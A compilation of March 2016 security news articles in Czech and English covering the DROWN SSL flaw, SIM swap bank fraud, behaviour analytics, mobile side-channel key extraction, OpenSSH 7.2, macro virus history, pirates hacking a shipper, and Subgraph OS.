Hlavní problém je v tom, že uživatel se před chybou nemůže nijak bránit. Zatímco před nejrůznějšími viry a trojskými koni jej dokážou ochránit antivirové programy, na zranitelnost DROWN jsou bezpečnostní aplikace krátké.

Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že je něco v nepořádku.

V ohrožení e-mailová komunikace i bankovnictví
„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň detailně popsal, jak může být chyba zneužita: „K využití DROWN zranitelnosti může dojít v případě, že služba umožňuje využívaní SSLv2 a TLS zároveň nebo je soukromý klíč využíván ještě na jiném serveru, který podporuje SSLv2. Výsledkem úspěšného zneužití zranitelnosti může být prolomení TLS komunikace mezi serverem a uživatelem.“

Co to znamená pro uživatele v praxi? I když se pohybují na zabezpečených stránkách, například v e-mailové schránce nebo v internetovém bankovnictví, neznamená to, že je jejich komunikace skutečně bezpečná.

Komunikace může být odposlouchávána
Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dříve, než dorazí na samotný server.

Trhlinu přitom obsahuje nezanedbatelná část webů po celém světě. „Podle předběžných odhadů je zranitelných až 33 % stránek využívajících HTTPS protokol,“ doplnil Bašta.

Jakých konkrétních webů se zranitelnost DROWN týká, však neuvedl. Je nicméně více než pravděpodobné, že jen v České republice budou tisíce serverů obsahujících chybu.

Otázka je, jak rychle dokážou poskytovatelé jednotlivých služeb zareagovat a své systémy skutečně opravit. Bezpečnostní experti o tom vědí své, i přes závažnost Chyby krvácejícího srdce příslušnou záplatu nenainstalovala ani rok po objevení více než polovina firem po celém světě.

Kvůli Chybě krvácejícího srdce mohli útočníci disponovat například přihlašovacími uživatelskými údaji, a to včetně soukromých hesel k e-mailům, sociálním sítím, on-line bankovnictví nebo nejrůznějším internetovým obchodům. Vzhledem k tomu, že řada účtů je navázána na platební karty, byla hrozba nebezpečí o to závažnější.

Mezi postiženými byly i velké portály, jako jsou například Yahoo.com, Flickr.com či Mail.com. I proto se podle BBC jednalo o jednu z nejzávažnějších bezpečnostních trhlin v historii internetu. Chyba, která by v takovém rozsahu vystavila internet potenciálním útokům, se totiž zatím nikdy neobjevila.


SIM swap fraud cases force bank to improve security
6.3.2016 Mobil

Two major high street banks will change security procedures after journalists demonstrated how to carry out SIM swap fraud attacks.
The BBC reported that two major high street banks will adopt new security measures to protect their customers. The decision to modify the security procedures follows the scoop made by two journalists from BBC Radio 4’s You and Yours programme that broke into an account online and removed money.

Cybercriminals are increasingly targeting bank customers with different techniques, one of them is known as ‘SIM swap fraud.’

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Criminal organizations obtain a customer’s bank details by launching a phishing campaign, or by purchasing them in the underground market.

At this point, the criminals open a parallel business account with the same victim’s bank, in the customer’s name. This is possible because the procedure involves fewer security checks when the victim is already a customer.

The criminals use answers to security questions obtained from the analysis of the victim’s social media accounts, to contact the victim’s mobile phone provider, posing as the customer, to report that their mobile device is lost or damaged.

They demonstrate their identity, answering basic security questions, this causes the cancellation of the old SIM and the activation of new one. From then the criminals can operate with the victim’s mobile account, intercepting or initiating calls, texts and authorizations that could allow them to transfer cash.

The cybercriminals can also request that security settings are changed to lock out the victim from the account.

Recently bank customers’ accounts have been successfully hacked with the SIM swap fraud technique, several victims reported the crimes to the You and Yours programme.

“You and Yours has been contacted by dozens of people affected by the scam. All say they have never revealed their security details to anyone, and the that first they knew something was wrong was their mobile phone going dead.” reported the BBC.

You and Yours producer Natalie Ms Donovan is a customer of the NatWest and decided to investigate on the SIM swap fraud cases.

SIM swap fraud natwest bank

She used her bank account as an experiment and her colleague Shari Vahl was able to break into her account without having specific information such as the banking customer number, PIN or any passwords.

“I did not know her mother’s maiden name, her pet’s name or her first school, and yet I was still able to change her PIN and password to lock her out of her own account.” continues Shari Vahl

In the experiment, the attacker only transferred £1.50 to his bank account by controlling the of Natalie Donovan ‘s mobile phone.

The journalists reported the issue to the NatWest, owned by Royal Bank of Scotland. Representatives from the Royal Bank of Scotland confirmed that that the systems for both banks would be changed as a direct result of the You and Yours investigation.

“This is a cross-industry problem, particularly with us, and the telecom companies. We working with Financial Fraud Action UK to make sure we’re communicating with each other … to make sure mobile phone security is as strong as it possibly can be.” said Chris Popple, managing director of NatWest Digital.


Detekce důmyslných útoků pomocí analýzy chování

6.3.2016 Zabezpečení
Big data a strojové učení pomáhají téměř v reálném čase posoudit riziko aktivit uživatelů, zda ještě vyhovují normě či naopak už jsou tzv. za hranou.

Zaměstnanec denně používá během pracovní doby legitimní oprávnění pro přístup k podnikovým systémům z podnikového pracoviště. Systém zůstává v bezpečí. Najednou však dojde po půlnoci k použití stejných oprávnění pro přístup k databázovému serveru a spustí se dotazy, které uživatel nikdy předtím nezadával. Je systém stále v bezpečí?

Možná je. Správci databáze musejí koneckonců dělat údržbu a údržba se obvykle činí po pracovní době – některé operace údržby vyžadují vykonání nových dotazů. Ale možná také není. Mohlo dojít k vyzrazení přihlašovacích údajů uživatele a právě může probíhat pokus o ukradení dat.

Konvenční bezpečnostní kontroly na takovou situaci neposkytnou jednoznačnou odpověď. Statická obrana perimetru již nestačí pro svět, ve kterém se krádeže dat stále častěji vykonávají prostřednictvím ukradených přihlašovacích údajů uživatelů.

Tyto případy však nelze srovnávat se zločinnými zaměstnanci, kteří zneužijí své přihlašovací údaje. Také současná prostředí BYOD mohou zcela zničit statický perimetr, jak dochází k neustálému přidávání nových pravidel pro externí přístup.

Jedním z inovativních přístupů se označuje jako analýza chování uživatelů (UBA, User Behavior Analytics). Dokáže tuto hádanku řešit pomocí analýz big dat a algoritmů strojového učení, které téměř v reálném čase posuzují riziko aktivit uživatelů.

Co umí UBA?

UBA využívá modelování k popisu normálního chování. Toto modelování zahrnuje informace o uživatelských rolích a funkcích z aplikací personálního oddělení a z adresářů včetně přístupu, účtů a oprávnění, aktivity a geografické lokalizační údaje shromážděné ze síťové infrastruktury, upozornění od obranných bezpečnostních řešení atd.

U těchto dat se vyhodnocují souvislosti a analyzují se na základě předchozích a současných aktivit. Tyto analýzy zohledňují mimo jiné také typy transakcí, využívané zdroje, trvání relací, konektivitu a obvyklé chování jedinců ze stejné skupiny.

UBA zjišťuje, co je ještě normální chování a co už jsou nezvyklé aktivity. Jestliže původně anomální chování jedné osoby (například půlnoční databázové dotazy) následně začnou vykonávat i další jedinci z téže skupiny, přestane se to považovat za střední či vysoké riziko.

Dále UBA vykonává modelování rizik. Anomální chování se automaticky nepovažuje za riziko. Musí se nejprve vyhodnotit z perspektivy potenciálního dopadu.

Pokud anomální činnost zahrnuje zdroje, které nejsou citlivé, jako jsou například informace o využití konferenční místnosti, je potenciální dopad nízký. Naopak pokusy o přístup k citlivým souborům, jako je například duševní vlastnictví organizace, však dostávají mnohem vyšší hodnocení.

Následně se riziko pro systém, tvořené určitou transakcí, definuje pomocí vzorce Riziko = Pravděpodobnost x Dopad.

Pravděpodobnost ve vzorci souvisí s pravděpodobností, že je dotyčné chování uživatele anomální. Zjišťuje se s využitím algoritmů pro modelování chování. Dopad se odvodí z úrovně důvěrnosti a důležitosti informace, se kterou se pracuje, a z kontroly, jež se používá pro práci s těmito údaji.

Transakce a jejich vypočítaná rizika se poté mohou spojit s konkrétním uživatelem, který tyto transakce vykonává, a výsledně se určí úroveň rizika.

Výpočet uživatelského rizika obvykle zahrnuje další faktory, jako jsou stupeň důvěrnosti aktiv, oprávnění, potenciální zranitelnosti, zásady atd. Jakékoli zvýšení těchto faktorů zvýší skóre rizika tohoto uživatele.

Všechny faktory v těchto výpočtech mohou ale mít své vlastní váhové hodnoty pro automatické vyladění celkového modelu.

Nakonec UBA sbírá, koreluje a analyzuje stovky atributů včetně situačních informací a informací o hrozbách od třetích stran. Výsledkem je bohatá množina dat s velikostí v řádu petabajtů, která zohledňuje kontext.

Podpora strojového učení

Algoritmy strojového učení UBA mohou nejen odfiltrovat a eliminovat falešné poplachy a vytvořit inteligenci pro riziko, kterou lze využít pro rozhodování, ale mohou také na základě shromažďovaných informací revidovat normy, předpovědi a celkové procesy hodnocení rizik...


New exploit steals secret cryptographic keys from mobile devices

5.3.2016 Mobil

A group of security researchers has devised a new attack scheme to steal cryptographic keys from both Android and iOS devices.
A team of security researchers from Tel Aviv University, Technion and The University of Adelaide has elaborated a new attack scheme to steal cryptographic keys from both Android and iOS devices.

Last month, the same team has demonstrated hot to steal sensitive information from targeted air-gapped systems, in June 2015, the group demonstrated that encryption keys can accidentally leak from a PC via radio waves by using a cheap consumer-grade kit.

This new attack allows the researchers to steal any kind of cryptographic keys including Bitcoin wallets and Apple Pay accounts.

“An attacker can non-invasively measure these physical effects using a $2 magnetic probe held in proximity to the device, or an improvised USB adapter connected to the phone’s USB cable, and a USB sound card. Using such measurements, we were able to fully extract secret signing keys from OpenSSL and CoreBitcoin running on iOS devices.” states a blog post published by the experts. “We also showed partial key leakage from OpenSSL running on Android and from iOS’s CommonCrypto.”

The researchers explained that their hacking technique is a non-invasive Side-Channel Attack. The attackers are able to extract the crypto key from a targeted device by analyzing the pattern of memory utilization or the electromagnetic outputs that are emitted during the decryption process.

The exploit devised by the researchers works against the Elliptic Curve Digital Signature Algorithm (ECDSA) used in the majority of applications based on cryptographic algorithms, including Bitcoin wallets and Apple Pay.
The researchers used a $2 magnetic probe placed near an iPhone 4 while the mobile devices were performing cryptographic operations in order to measure enough electromagnetic emanations and extract the secret cryptographic keys used by many different applications.

Another possible attack scenario sees a home-made USB pass-through adapter connected to the USB cable of the smartphone and a USB sound card to capture the signal.

Obviously, the attacker needs a physical access to the device to place a probe or cable in proximity, the attack also needs the targeted device will perform enough crypto operations to measure a few thousand of ECDSA signatures.

steal cryptographic keys from mobile
The team also successfully tested the attack on a Sony-Ericsson Xperia X10 Phone running Android.

“OpenSSL’s ECDSA running on Android phones is also vulnerable to our attacks. For example, here is a Sony Xperia 10s being measured, with our lab-grade measurement equipment:”

steal cryptographic keys from mobile 2

The group of researchers also cited a study conducted by another team of security experts that devised a similar Side-Channel attack exploiting a flaw in the Android version of the BouncyCastle crypto library. In this attack scenario, an attacker could analyze electromagnetic emissions to extract cryptographic keys.

All the iOS versions from 7.1.2 to 8.3 are vulnerable to the side-channel attack, only exception is the last iOS 9.x version that implements security countermeasures against side-channel attacks.

The experts highlighted that hackers can exploit vulnerabilities affecting mobile applications running on mobile devices. The researchers demonstrated how to hack the iOS app CoreBitcoin that is used to protect Bitcoin wallets on Apple mobile devices.

If you want more details give a look to the paper published by the researchers.


OpenSSH 7.2: SHA-2 a chytřejší ssh-agent
5.3.2016
Zabezpečení
Po několika rychle vydaných verzích OpenSSH, opravujících několik závažných bezpečnostních chyb, přichází opět verze s novými funkcemi.
Facebook Twitter Google+ Líbí se vám článek?
Podpořte redakci
8 NÁZORŮ
Bezpečnost (nejen posledních verzí)

Poslední verze, která přišla s novými funkcemi a prošla řádným testováním, byla verze 6.9. Následující verze 7.0p1 přinesla několik nových funkcí, ale hlavně opravovala čtyři závažné bezpečnostní chyby, primárně související s integrací PAM (CVE-2015–6563, CVE-2015–6564), špatným nastavením přístupu k TTY na serveru (CVE-2015–6565) a možností překročit povolený počet pokusů o zadání hesla při využití ChallengeResponseAuthentication (CVE-2015–5600).

Následující verze 7.1p1 vyšla deset dní po verzi 7.0 a opravovala logickou chybu ve vyhodnocování nastavení PermitRootLogin without-password, která mohla nastat v závislosti na nastavení v čase kompilace.

Roaming
Další verze, 7.1p2, přišla v polovině ledna a zakazovala funkci Roaming, která byla ve výchozím nastavení povolená a zneužitelná ze strany modifikovaného serveru (CVE-2016–0777, CVE-2016–0778, CVE-2016–1907). V posledních verzích již existovaly různé obranné mechanismy zabraňující úspěšnému zneužití, ale tato funkce existovala od verze 5.4, tedy více než 6 let a při určitých okolnostech mohla vést k odeslání části paměti s privátním klíčem zákeřnému serveru.

Aktuální verze tedy odebírá celý kód související s funkcí Roaming, který nikdy nebyl pořádně zdokumentovaný, otestovaný a mohl by být zdrojem dalších problémů. Výchozí konfigurace nově nastavuje sandbox před-autentizačního procesu (na Linuxu je dnes většinou použitý seccomp, na OpenBSD pledge) minimalizující jeho privilegia.

X11 a staré algoritmy
Nová verze opravuje další problém spojený s tunelováním X11 protokolu na dnešních systémech bez rozšíření XSECURITY, kdy výchozím chováním bylo tiché ignorování selhání požadavku na Untrusted spojení a použití neomezeného.

Aktuální verze posouvá minimální velikost akceptovaných prvočísel pro výměnu klíčů pomocí DH na 2048 bitů, která je zatím za hranicí potenciálního prolomení (Logjam).

Dále je ve výchozím nastavení klienta zakázána většina historických algoritmů ( blowfish-cbc, cast128-cbc, arcfour-*, ...) na straně klienta. Ty byly již dříve odebrány z výchozí serverové konfigurace. Stejně tak jsou nově zakázány HMAC algoritmy používající ořezané/zkrácené MD5.

Nové funkce

SHA-2
První novinkou, které se můžeme dočkat, je možnost použití SHA-2 256 a SHA-2 512 při autentizace privátním RSA nebo DSA klíčem. V původním protokolu SSH2 (rfc4253) je pevně určen hashovací algoritmus SHA-1, který již není doporučovaný. Proto došlo k rozšíření protokolu (zatím k dispozici jako návrhy, pod hlavičkou Bitvise – komerční SSH server a klient pro Windows) o tyto nové algoritmy pro podpis, o standardní možnost tyto algoritmy oznamovat druhé straně a následně používat. Pro uživatele se v tomto směru nic nemění, ale jedná se o další krok k větší flexibilitě, robustnosti a vyšší bezpečnosti samotného protokolu.

Inteligentní ssh-agent
Další užitečnou funkcí je změna procesu, jakým je možné používat ssh-agent. Dosud bylo potřeba před použitím klíče z ssh, ručně přidat klíče do agenta a klíč „odemknout“. Nyní je možnost přidávat klíče „za běhu“, v tu chvíli kdy klíč poprvé použijeme. To umožňuje omezit počet odemčených klíčů při startu systému na minimum a s vhodným nastavením životnosti klíčů v agentovi (přepínač -t), je můžeme také automaticky „zamykat“. Tato funkce je ve výchozím nastavení vypnutá, ale věřím, že si brzo najde své uživatele, až většina distribucí aktualizuje.

Příklad chování:

[me@f24 ~]$ ssh-copy-id -f -i ./rsa.pub test@f24
test@f24's password:
[me@f24 ~]$ ssh-add -l
The agent has no identities.
[me@f24 ~]$ ssh -i ./rsa -oAddKeysToAgent=yes test@f24
Enter passphrase for key './rsa':
[test@f24 ~]$ logout
Connection to localhost closed.
[me@f24 ~]$ ssh -i ./rsa -oAddKeysToAgent=yes test@f24
[test@f24 ~]$
Kromě striktních možností, které zakazují nebo povolují tuto funkci, existuje také možnost „ask“, která se před přidáním klíče zeptá pomocí dialogu ssh-askpass.

Omezení klíčů na serveru
K dalšímu zjednodušení došlo na straně serveru v možnosti přidávat omezení jednotlivým klíčům. Tato funkce je většinou použita pro skripty provádějící vzdáleně jeden určitý úkol. Dosud bylo potřeba přidávat dlouhý seznam privilegií ( no-pty,no-port-forwarding,no-agent-forwarding,no-X11-forwarding,...), kterými chceme připojujícího se uživatele omezit. Nyní je možné použít klíčové slovo restrict, které nahrazuje všechna zákazová klíčová slova, včetně těch v budoucnosti přidaných, a pokud chceme některou akci povolit, je to možné pomocí explicitního whitelistu ( restrict,pty,port-forwarding,...).

Další rozšíření dostaly také nástroje ssh-keygen a ssh-keyscan, hlavně v souvislostí se zpracováním certifikátů a otisků klíčů.

Opravy chyb

Proběhla aktualizace nástroje ssh-copy-id, který obsahoval v posledních verzích několik problémů. Možnost obměny klíčů sezení (rekey) se dočkala revize pro velké množství přenesených dat, které bylo problémové.

SFTP server vyžaduje rozšířený glob(), jehož struktury nejsou binárně kompatibilní s verzí poskytovanou Linuxem. Tato funkce a její struktury byly přejmenovány jako příprava pro podporu klíčového slovaInclude v rámci konfiguračních souborů.

Více informací naleznete v oficiálním oznámení. Pokud si chcete nové funkce OpenSSH vyzkoušet, balíčky pro aktuální Fedoru jsou již k dispozici.


Historie hackingu: Vývoj virů v dokumentech

5.3.2016 Hacking
Dlouhé roky to byla nezpochybnitelná pravda informační bezpečnosti: dokumenty nemohou obsahovat viry, zavirovat lze pouze spustitelné soubory (maximálně boot sektory disket a disků). Historie nám ovšem už mnohokrát ukázala, že věčné pravdy jen málokdy platí věčně, a v počítačové bezpečnosti zvláště.

Dlouhé roky se viry dokumentům vyhýbaly. Prostě proto, že je nešlo kam vložit: ať se autor snažil sebevíc, nikdy spustitelný kód nedostal příležitost.

Dnes s odstupem času a o desítky let zkušeností (inu, po bitvě je každý generál) můžeme říci, že jsme měli spíše štěstí: nějaká bezpečnostní chyba umožňující spuštění kódu „propašovaného“ do dokumentu by se tehdy už bezesporu našla, zvláště v době, kdy byla bezpečnost přehlíženou Popelkou. Leč nikdo se o nic podobného nepokoušel.

Pokud si odmyslíme možnost bezpečnostní chyby, pak lze konstatovat, že dokumenty škodlivé kódy obsahovat nemohou. Dokument je totiž soubor, který skutečný program (grafický či textový editor apod.) pouze zobrazí, ale nevykoná jej. Jinými slovy – kniha s návodem na výbušninu vám z principu věci v ruce také neexploduje.

MS Office mění hru

Jenže co je jednoduché v reálném světě, bývá v kyberprostoru zpravidla jinak. Stačí se podívat do osudového roku 1995, kdy na svět přišly Windows 95. A s nimi i kancelářský balík Office s netušenými možnostmi a vlastnostmi.

Jednou z nich byla i schopnost vkládat do dokumentů makra. Záměrem tvůrců bylo zjednodušit uživatelům dělání nudných, složitých nebo opakujících se operací: ty bylo možné nahradit vložením skriptu, který za ně vše vykonal.

Tvůrci konceptu ovšem dali makrům do vínku velmi silný jazyk: Visual Basic, což znamenalo, že makra mohla téměř cokoliv včetně formátování disku nebo rozesílání e-mailů.

První demonstrační makrovirus tohoto typu přišel v prosinci 1994 a měl název DMV (Document Macro Virus). Přesněji šlo o dva různé makroviry: jeden pro Word, druhý pro Excel. Šlo jen o ukázkové kódy, které měly sloužit coby varování.

V srpnu 1995 (ve stejném měsíci, kdy se začaly prodávat Windows 95) pak přišel skutečný makrovirus. Jmenoval se Concept a nad jeho původem se dodnes vznáší celá řada otazníků.

Jeho autor měl totiž výtečnou znalost prostředí maker: takovou, jakou nelze dosáhnout ani velmi důkladným studiem. Dodnes se spekuluje (ověřit to pochopitelně nelze), že Concept vytvořil některý ze zaměstnanců Microsoftu, který se na vývoji koncepce přímo podílel.

Concept se každopádně stal jedním z historicky nejrozšířenějších virů. Důvod je jednoduchý: na příchod makrovirů nebyli připraveni uživatelé ani antivirová ochrana. Ti prvně jmenovaní roky poslouchali, že dokumenty prostě nemohou obsahovat viry. Ti druzí pak na tomto předpokladu postavili své algoritmy.

Vše ale bylo třeba změnit a nebylo to vůbec jednoduché. Antivirové firmy například opakovaně (a také marně) žádaly Microsoft o zveřejnění některých funkcí či parametrů, které by jim umožnily efektivně makroviry potírat. Asi nikoho tak nepřekvapí, že podíl makrovirů na celkovém počtu škodlivých kódů skočil během jediného roku z nuly na devadesát procent.

České kotliny se tenkrát tento problém příliš netýkal, protože při překládání kancelářského balíku do češtiny si někdo dal práci a přeložil nejen hlášky, ale i vnitřní strukturu.

Makroviry psané pro anglické prostředí tak v Česku neměly šanci. Když například hledaly instrukci „Open“, nepochodily. Protože v tuzemské struktuře byl příkaz „Otevřít“.

Lotus 123 a JPG

Ale abychom nenasazovali psí hlavu jen systému Windows: makra v dokumentech existovala již dříve. Demonstrativně bylo prokázané, že pro prostředí Lotus 123 bylo možné vytvářet sebereplikační makra. Teoreticky dokonce již od roku 1989, kdy byla tato funkce do prostředí implementována.

Prakticky se ale viry v Lotusu 123 nikdy nestaly problémem. A to díky tomu, že tam implementovaný jazyk byl velmi slabý. A také třeba i proto, že aktivace makra nebyla vůbec jednoduchá a zvládl ji jen zkušený uživatel. Hypotetický makrovirus by tak vyžadoval opravdu významnou pomoc.

Pandořina skříňka se každopádně otevřela. Programátoři objevili sílu maker, takže je začali přidávat do všech možných i nemožných aplikací. Světem se tak začaly šířit makroviry pro Corel (GaLaDRieL) nebo AutoCad (ACAD.Star).

Skutečně značné nebezpečí ale představoval až škodlivý kód Perrun, jenž se objevil v roce 2002 a který byl schopný infikovat formát obrázků JPG.

Řešil to sice jistou obezličkou (do formátu JPG přidával spustitelný kód a pomocí zvláštního EXE souboru s odkazem v registrech se na něm odkazoval), ale zbořil další dogma.

Pak se objevilo ještě několik škodlivých kódů, které byly schopné JPG infikovat (například modifikací metadat), ale naštěstí se příliš neprosadily.

Důvod byl prozaický: ve stejné době vrcholila „zlatá éra e-mailových červů“. Tyto kódy byly mnohem rychlejší, cílenější a pro útočníky pohodlnější, takže tvorba nějakých virů v dokumentech hackery příliš nezajímala.

Což je možná dobře, protože kdyby se škodlivé kódy v obrázcích významně rozšířily, kybernetický svět by zřejmě dnes vypadal krapet jinak.

Návrat krále?

Po určitém útlumu každopádně viry v dokumentech zažily svůj návrat. Nejprve se jim podařilo dobýt PDF formát (před deseti lety byla významná část dokumentů v tomto formátu na webu nějakým způsobem infikovaná, důvodem byla absence záplatovacího mechanismu na straně výrobce programu).

A dnes se hojně využívají k cílovým útokům třeba v případě průmyslové špionáže.


How to Steal Secret Encryption Keys from Android and iOS SmartPhones
4.3.2016 Android  iOS
Unlike desktops, your mobile devices carry all sorts of information from your personal emails to your sensitive financial details. And due to this, the hackers have shifted their interest to the mobile platform.
Every week new exploits are discovered for iOS and Android platform, most of the times separately, but the recently discovered exploit targets both Android as well as iOS devices.
A team of security researchers from Tel Aviv University, Technion and The University of Adelaide has devised an attack to steal cryptographic keys used to protect Bitcoin wallets, Apple Pay accounts, and other highly sensitive services from Android and iOS devices.
The team is the same group of researchers who had experimented a number of different hacks to extract data from computers. Last month, the team demonstrated how to steal sensitive data from a target air-gapped computer located in another room.
Past years, the team also demonstrated how to extract secret decryption keys from computers using just a radio receiver and a piece of pita bread, and how to extract the cryptographic key just by solely touching the chassis of the computer.
Side-Channel Attacks
According to the researchers, the recent exploit is a non-invasive Side-Channel Attack: Attack that extracts the secret crypto key from a system by analyzing the pattern of memory utilization or the electromagnetic outputs of the device that are emitted during the decryption process.
The exploit works against the Elliptic Curve Digital Signature Algorithm (ECDSA), a standard digital signature algorithm that is most widely used in many applications like Bitcoin wallets and Apple Pay and is faster than several other cryptosystems.
How to Steal Secret Encryption Keys?
how-to-hack-android-story
During the experimental hack, the researchers placed a $2 magnetic probe near an iPhone 4 when the phone was performing cryptographic operations.
While performing cryptographic operations, the security researchers measured enough electromagnetic emanations and were able to fully extract the secret key used to authenticate the end user's sensitive data and financial transactions.
The same hack can be performed using an improvised USB adapter connected to the phone's USB cable, and a USB sound card to capture the signal.
"Using such measurements, we were able to fully extract secret signing keys from OpenSSL and CoreBitcoin running on iOS devices," the researchers wrote in a blog post published Wednesday. "We also showed partial key leakage from OpenSSL running on Android and from iOS's CommonCrypto."
The researchers also experimented their exploit on a Sony-Ericsson Xperia X10 Phone running Android and said they believe such an attack is feasible.
The security researchers also cited a recent independent research by a separate team of security researchers that discovered a similar Side-Channel flaw in Android's version of the BouncyCastle crypto library, making the device vulnerable to intrusive electromagnetic key extraction attacks.
Currently, the hack requires an attacker to have physical control of, or, at least, a probe or cable in proximity to, a vulnerable mobile device as long as it performed enough tasks to measure a few thousand of ECDSA signatures.
Affected Devices
Older iOS versions 7.1.2 through 8.3 are vulnerable to the side-channel attack. The current iOS 9.x version includes defenses against side-channel attacks, so are unaffected.
However, nothing can save iPhone and iPad users even running current iOS versions if they are using vulnerable apps. One such vulnerable iOS app is CoreBitcoin that is used to protect Bitcoin wallets on iPhones and iPads.
Developers of CoreBitcoin told the security researchers that they are planning to replace their current crypto library with one that is not susceptible to the key extraction attack. Meanwhile, the recent version of Bitcoin Core is not vulnerable.
Both OpenSSL versions 1.0.x and 1.1.x are vulnerable except when compiled for x86-64 processors with the non-default option enabled or when running a special option available for ARM CPUs.
The team has already reported the vulnerability to the maintainers of OpenSSL, who said that hardware side-channel attacks are not a part of their threat model.
For in-depth technical details, you can read the full research paper [PDF].


Real pirates used hacking techniques to raid a shipping company
4.3.2016 Hacking

Real pirates have hacked into a shipping company to locate valuable cargo before hijacking vessels in targeted attacks. Technology meets Piracy.
The technology is enlarging our surface of attack in a dramatic way, every company in every industry is potentially a target. Let’s discuss today of a singular case that demonstrates it, pirates have hacked into a shipping company to locate valuable cargo before hijacking vessels in targeted attacks.

The criminal organisation breached the content management system (CMS) of the unnamed shipping company to determinate the exact position of containers having the most valuable cargo.

This is a considerable advantage for the traditional piracy, in the past criminals had patrol boats using scanners to locate the precious commodities. By obtaining the location of the valuable cargo, it makes easier and faster hijacking the vessels.

The case was also reported in the Verizon’s Data Breach Digest addendum report.

“However, in recent months, the pirates had changed their tactics somewhat, and in a manner that the victim found extremely disconcerting. Rather than spending days holding boats and their crew hostage while they rummaged through the cargo, these pirates began to attack shipping vessels in an extremely targeted and timely fashion. Specifically, they would board a shipping vessel, force the crew into one area and within a short amount of time they would depart. When crews eventually left their safe rooms hours later, it was to find that the pirates had headed straight for certain cargo containers. It became apparent to the shipping company that the pirates had specific knowledge of the contents of each of the shipping crates being moved. They’d board a vessel, locate by bar code specific sought-after crates containing valuables, steal the contents of that crate—and that crate only—and then depart the vessel without further incident. Fast, clean and easy.” states the report.

In the specific case, the hackers made a number of OPSEC mistakes that exposed their identity to the investigators, for example, they failed to protect the traffic to the compromised server.

HMAS Melbourne's boarding party intercepts a suspected pirate boat. *** Local Caption *** Royal Australian Navy ship, HMAS Melbourne operating off the coast of Somalia, intercepted suspected pirates as part of a Combined Task Force 151 tasking for Combined Maritime Forces on 15 October 2013.

“One of the first mistakes made by the threat actors was failing to enable SSL on the web shell. As such, all the commands were sent over the internet in plain text. This allowed us to write code to extract these commands from the full packet capture (FPC) data. We were ultimately able to recover every command the threat actors issued, which painted a very clear picture. These threat actors, while given points for creativity, were clearly not highly skilled. For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.” continues the report.

The shipping company, once discovered the cyber attacks, secured its servers and improved the operational security of its systems.

Piracy is a very widespread phenomenon in some areas of the world, the use of technology can definitely make the most complex activities of prevention and contrast.

There are numerous cases related to the collaboration between ordinary crime and hacking crews, I remember an episode occurred in 2013 when an investigation of a cyber-attack on the Belgian port of Antwerp allowed law enforcement to discover that drug traffickers recruited hackers to hack IT systems that controlled the movement and location of the containers.

“Police carried out a series of raids in Belgium and Holland earlier this year, seizing computer-hacking equipment as well as large quantities of cocaine and heroin, guns and a suitcase full of cash. Fifteen people are currently awaiting trial in the two countries. Mr Wainwright says the alleged plot demonstrates how the internet is being used as a “freelance marketplace” in which drug trafficking groups recruit hackers to help them carry out cyber-attacks “to order”. “[The case] is an example of how organized crime is becoming more enterprising, especially online,” he says.

cybercrime hackers equipment used at ports piracy
The Europol official confirmed that organized crime groups were paying for hackers involved in criminal activities. The profitable collaboration started at least in 2011, Dutch-based trafficking group hid cocaine and heroin among legitimate cargoes, including timber and bananas shipped in containers from South America. The role of hackers based in Belgium was to infiltrate computer networks in at least two companies operating in the port of Antwerp to access secure data giving them the location and security details of containers.


Subgraph OS — Secure Linux Operating System for Non-Technical Users
4.3.2016 Security
Information security and privacy are consistently hot topics after Edward Snowden revelations of NSA's global surveillance that brought the world's attention towards data protection and encryption as never before.
Moreover, just days after Windows 10's successful launch last summer, we saw various default settings in the Microsoft's newest OS that compromise users' privacy, making a large number of geeks, as well as regular users, migrate to Linux.
However, the problem is that majority of users are not friendly to the Linux environment. They don't know how to configure their machine with right privacy and security settings, which makes them still open to hacking and surveillance.
However, this gaping hole can be filled with a Debian-based Security-focused Linux operating system called Subgraph OS: A key solution to your Privacy Fear.
Subgraph OS is a feather weighted Linux flavor that aims to combat hacking attacks easier, even on fairly low-powered computers and laptops.
Subgraph OS comes with all the privacy and security options auto-configured, eliminating the user's manual configuration.
Security-focused operating systems do exist, but they are often very resource intensive and can be run only on specific hardware. They are also a real technical challenge for users who don't know the advanced techniques required to get a secure operating system running.
Why Should You Install Subgraph Linux OS?
Subgraph OS — Secure Linux Operating System for Non-Technical Users
Subgraph OS offers more than just kernel security. The Linux-based operating system comes with a slew of security and privacy features that its developers believe will be more accessible to non-technical users.
The OS also includes several applications and components that reduce the user's attack surface. Let's have a close look on important features Subgraph OS provides.
1. Automated Enhanced Protection with Application Sandboxing using Containers
A security feature called Oz is possibly the most interesting feature of Subgraph OS. Oz is a system for isolating programs so that if an attacker exploits an application security vulnerability, the rest of your machine and your network will remain largely unaffected.
'Oz' makes this possible by delimiting the permission applications have to other parts of the computer, so that when an attacker compromises the security hole in any application it does not allow any malicious activities to take place.
2. Mandatory Full Disk Encryption (FDE)
Subgraph OS offers Full Disk Encryption by default; thus making it a mandatory step for its users to cling on to the security.
Full disk encryption enables a shadow of encryption to protect your hard disks, preventing your data even if your hard drive got misplaced or fell into the wrong hands.
Additionally, Subgraph OS also wipe off the memory when the system is shutdown in an effort to defend the Cold Boot Attacks.
Cold Boot Attacks are a type of side channel attacks that take the advantage of data that resides in the DRAM and SRAM cells for few seconds soon after Power OFF.
3. Online Anonymity — Everything through Tor
secure-operating-system
Subgraph OS routes all your traffic through the TOR anonymity network by default, making it difficult for attackers to figure out the actual physical location of their targets. This would ensure the endpoint security.
Also More: Is This Security-Focused Linux Kernel Really UnHackable?
4. Advanced Proxy Setting
Secure Linux Operating System
Application's transmission to the outside world is carried out via Metaproxy application, which would facilitate to identify the legitimate connections.
